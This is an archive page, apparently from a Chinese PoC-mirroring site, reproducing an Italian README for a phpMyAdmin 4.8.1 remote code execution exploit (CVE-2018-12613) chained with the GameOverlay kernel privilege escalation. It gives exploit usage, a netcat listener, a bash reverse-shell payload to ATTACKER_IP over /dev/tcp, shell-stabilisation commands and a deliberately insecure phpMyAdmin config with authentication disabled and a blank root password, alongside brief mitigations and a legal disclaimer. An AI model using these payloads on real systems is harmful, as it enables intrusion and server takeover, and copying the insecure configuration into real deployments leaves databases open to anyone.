支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: d1a30ed28c05879a49d63990d98bf45130d36a73

来源
关联漏洞
标题:Canonical Ubuntu Linux 安全漏洞 (CVE-2023-2640)
Description:Canonical Ubuntu Linux是英国科能软件(Canonical)公司的一套Linux操作系统。 Canonical Ubuntu Linux存在安全漏洞,该漏洞源于内核中的OverlayFS没有执行权限检查,导致存在权限提升漏洞。
Description
Dimostrazione di una vulnerabilità RCE (Remote Code Execution) in phpMyAdmin 4.8.1, con exploit per reverse shell e analisi di privilege escalation tramite la vulnerabilità CVE-2023-2640/CVE-2023-32629 (GameOverlay) su kernel Linux.
介绍
# phpMyAdmin 4.8.1 - Remote Code Execution (RCE) Exploit

[![License: GPL-3.0](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)
[![Open Source](https://img.shields.io/badge/Open%20Source-Yes-brightgreen)](https://opensource.org)
![Ethical Hacking](https://img.shields.io/badge/Ethical_Hacking-Responsible-red)


> **Filosofia Open Source**: Questo progetto è rilasciato sotto **GNU GPLv3** per garantire che tutte le modifiche e derivati rimangano liberi e open source.  
> **Avviso Legale**: Utilizzare solo su sistemi autorizzati. La violazione non autorizzata è illegale.

## Panoramica
Exploit per la vulnerabilità **CVE-2018-12613** in phpMyAdmin 4.8.1 che consente:
- Esecuzione di codice remoto (RCE) tramite injection PHP
- Reverse shell interattiva
- Privilege escalation (se combinato con CVE-2023-2640)

## Prerequisiti
- **Target**: 
  - phpMyAdmin 4.8.0/4.8.1
  - PHP < 7.3 (senza `disable_functions` restrittive)
- **Attaccante**:
  - Python 3.x
  - `netcat` per la reverse shell

## Esecuzione

### 1. Exploit Base (RCE)
	python3 exploit.py <TARGET_IP> <PORT> <PHPMA_PATH> <USER> <PASSWORD> "<COMMAND>"

### 2. Reverse Shell
#### 1. Sulla Macchina dell'attaccante
    nc -lnvp 4444
#### 2. Eseguire l'exploit con payload bash
    python3 exploit.py 192.168.1.100 80 /phpmyadmin admin pass123 \
    "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
#### 3. Post-Exploitation
##### Per ottenere una shell stabile:
    python3 -c 'import pty; pty.spawn("/bin/bash")'
    # Oppure
    script /dev/null -c bash
## Configurazione Vulnearbile
### Per testing locale, modificare config.inc.php:
	$cfg['Servers'][1]['auth_type'] = 'config'; // Disabilita autenticazione
	$cfg['Servers'][1]['user'] = 'root';
	$cfg['Servers'][1]['password'] = '';
	$cfg['Servers'][1]['AllowNoPassword'] = true;

## Mitigazioni
### 1. Aggiornamento:
	sudo apt upgrade phpmyadmin
### 2. Hardering PHP:
	; php.ini
    allow_url_include = Off
    disable_functions = exec,passthru,shell_exec,system
### 3. Regole IPtables:
    iptables -A OUTPUT -p tcp --dport 4444 -j DROP

Risorse

    CVE-2018-12613

    GameOverlay Advisory

    MITRE ATT&CK T1190

## Autori

    Filippo Zullo

    Domenico Palmisano

    Alessandro Musto

    Elia Sakellarides
    

## Struttura del Repository

```plaintext
.
├── 📁 exploits/                  # Script di exploit
│   ├── 📁 phpmyadmin_rce/        # RCE in phpMyAdmin
│   │   ├── 📄 exploit.py         # Script principale (CVE-2018-12613)
│   │   ├── 📄 reverse_shell.sh   # Generator per reverse shell
│   │   └── 📄 auth_bypass.md     # Tecniche di bypass autenticazione
│   │
│   └── 📁 gameoverlay/           # Privilege escalation
│       ├── 📄 exploit.sh         # Exploit CVE-2023-2640 
│       └── 📄 kernel_patches.md  # Kernel vulnerabili
│
├── 📁 mitigations/               # Contromisure
│   ├── 📁 php_hardening/         # Hardening PHP
│   │   ├── 📄 php.ini.patch      # Configurazioni sicure
│   │   └── 📄 apache_config.md   # Setup Apache
│   │
│   ├── 📁 iptables_rules/        # Firewall
│   │   ├── 📄 iptables_rules.txt # Regole di blocco
│   │   └── 📄 setup_guide.md     # Guida implementazione
│   │
│   └── 📁 kernel_protections/    # Mitigazioni kernel
│       ├── 📄 disable_userns.sh  # Disabilita user namespace
│       └── 📄 sysctl_config.md   # Configurazione permanente
│
├── 📁 docs/                      # Documentazione
│   ├── 📄 project_report.pdf     # Report completo (PDF)
│   ├── 📄 setup_guide.md         # Istruzioni dettagliate
│   └── 📁 screenshots/           # Prove visive
│       ├── 📄 rce_poc.png        # Screenshot RCE
│       └── 📄 iptables_block.png # Traffico bloccato
│
├── 📁 scripts/                   # Utility
│   ├── 📄 install_dependencies.sh # Setup automatico
│   └── 📄 cleanup.sh             # Pulizia ambiente
│
├── 📄 README.md                  # Documentazione principale
└── 📄 LICENSE                    # Licenza GNU GPL-3.0
文件快照

[4.0K] /data/pocs/d1a30ed28c05879a49d63990d98bf45130d36a73 ├── [4.0K] exploits │   └── [4.0K] phpmyadmin_rce │   ├── [1.6K] exploit.py │   ├── [ 1] readme.md │   └── [3.4K] reverse_shell.sh └── [4.2K] README.md 2 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。